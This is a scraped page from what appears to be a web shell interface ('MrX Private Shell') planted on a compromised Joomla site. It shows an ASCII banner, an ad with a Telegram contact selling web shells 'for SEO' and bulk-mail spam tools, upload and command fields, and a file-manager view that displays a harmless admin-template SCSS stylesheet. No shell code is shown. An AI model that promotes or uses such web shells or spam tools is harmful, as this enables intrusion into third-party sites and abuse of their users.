__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
// Header
.header {
  z-index: $zindex-header;
  color: $white;
  background: $header-bg;

  &-inside {
    display: flex;
    min-height: 54px;
  }

  a {
    color: $white;

    &:before {
      display: none;
    }
  }

  .logo {
    display: flex;
    flex-flow: row nowrap;
    align-items: center;
    width: $sidebar-width;
    height: 100%;
    padding: 12px 5px;
    overflow: hidden;
    background-color: $header-logo-bg;
    transition: all .3s ease-in-out;

    &.small {
      justify-content: center;
      width: $sidebar-width-closed;
      transition: all .3s ease-in-out;

      svg,
      img {

        &:not(.logo-collapsed) {
          display: none;
        }

        &.logo-collapsed {
          display: inline-block;
          width: 20px;
          height: 20px;
          object-fit: contain;
          object-position: center center;
        }
      }
    }

    svg,
    img {
      width: 150px;
      height: 30px;
      margin: 0 .35rem;
      object-fit: contain;
      object-position: left center;

      &.logo-collapsed {
        display: none;
      }
    }
  }

  .page-title {
    padding: 0 1rem;
    margin: 0;
    overflow: hidden;
    font-size: 1.2rem;
    color: $white;
    text-overflow: ellipsis;
    white-space: nowrap;

    > span {
      margin-inline-end: .25rem;
    }
  }

  .dropdown-menu {
    font-size: .85rem;
  }

  .dropdown-header,
  .dropdown-item {
    padding: .82rem .75rem;
    color: $white;
    background-color: $dropdown-item-bg; // var(--template-bg-dark-70);

    > span {
      margin-inline-end: .5rem;
    }

    &:hover {
      background-color: $dropdown-item-bg-hvr; // var(--template-bg-dark);
    }
  }

  .dropdown-header {
    padding: .75rem;
    font-size: inherit;
    background-color: $dropdown-header-bg; // var(--template-bg-dark);
  }
}

.header-items {
  align-items: center;
  justify-content: flex-end;
  width: 50%;
  margin: 15px;
  margin-inline-start: auto;

  .dropdown-toggle {
    background-color: transparent;
    border: 0;

    &::after {
      display: none;
    }
  }
}

.header-item {
  position: relative;
  margin: 0 4px;
}

.header-item-content {
  display: flex;
  align-items: center;
  line-height: 1rem;
  color: $white;
  background-color: $header-item-content-bg;
  border: none;
  border-radius: $header-item-content-border-radius;
  padding-inline-end: 4px;

  a,
  button {
    color: $white;
    text-decoration: none;
  }

  a {
    display: flex;
  }

  &:not(.no-link):not(.joomlaversion):hover {
    background-color: $header-item-content-bg-hvr;
  }

  &.joomlaversion {
    color: $header-item-content-jversion-color;
    background-color: $header-item-content-jversion-bg;

    .header-item-text {
      padding-inline-end: 12px;
    }
  }
}

.header-item-icon {
  > * {
    display: flex;
    align-items: center;
    justify-content: center;
    width: 28px;
    min-width: 28px;
    height: 28px;
    margin: 4px;
    color: $white;
    background-color: var(--template-bg-dark);
    border-radius: 16px;
  }

  span {
    margin: 4px;
  }
}

.header-item-count {
  margin-inline-end: .5rem;
}

.header-item-text {
  padding: 0 8px 0 4px;
  font-size: .75rem;
  white-space: nowrap;
}

.header-more-btn {
  margin: 0 5px;
  font-size: 1.7rem;
}

.header-dd-items {
  .header-item-content {
    background: transparent;
  }

  .header-item-text {
    font-size: .75rem;
  }

  .dropdown-item {
    padding: .5rem .75rem;
  }
}

.header-dd-item {
  padding: 3px 6px;
}

@include media-breakpoint-down(md) {
  .header-items {
    position: fixed;
    bottom: 0;
    flex-direction: row-reverse;
    width: 100%;
    padding: 10px 0;
    margin: 0;
    background: var(--template-bg-dark);

    .#{$jicon-css-prefix}-angle-down,
    .#{$fa-css-prefix}-angle-down {
      transform: rotate(180deg);
    }
  }
}

@if $enable-dark-mode {
  @include color-mode(dark) {
    .header-item-icon > * {
      background: var(--header-bg);
    }
  }
}

Filemanager

Name Type Size Permission Actions
_alerts.scss File 1.46 KB 0664
_calendar.scss File 762 B 0664
_edit.scss File 280 B 0664
_form.scss File 3.96 KB 0664
_global.scss File 3.83 KB 0664
_header.scss File 3.88 KB 0664
_icons.scss File 1.81 KB 0664
_iframe.scss File 69 B 0664
_layout.scss File 367 B 0664
_lists.scss File 105 B 0664
_login.scss File 4.57 KB 0664
_modals.scss File 9.15 KB 0664
_quickicons.scss File 4.31 KB 0664
_shepard-modals.scss File 1.11 KB 0664
_sidebar-nav.scss File 653 B 0664
_sidebar.scss File 6.01 KB 0664
_switcher.scss File 570 B 0664
_toolbar.scss File 5.85 KB 0664
_treeselect.scss File 1.97 KB 0664
_utilities.scss File 2.41 KB 0664
Filemanager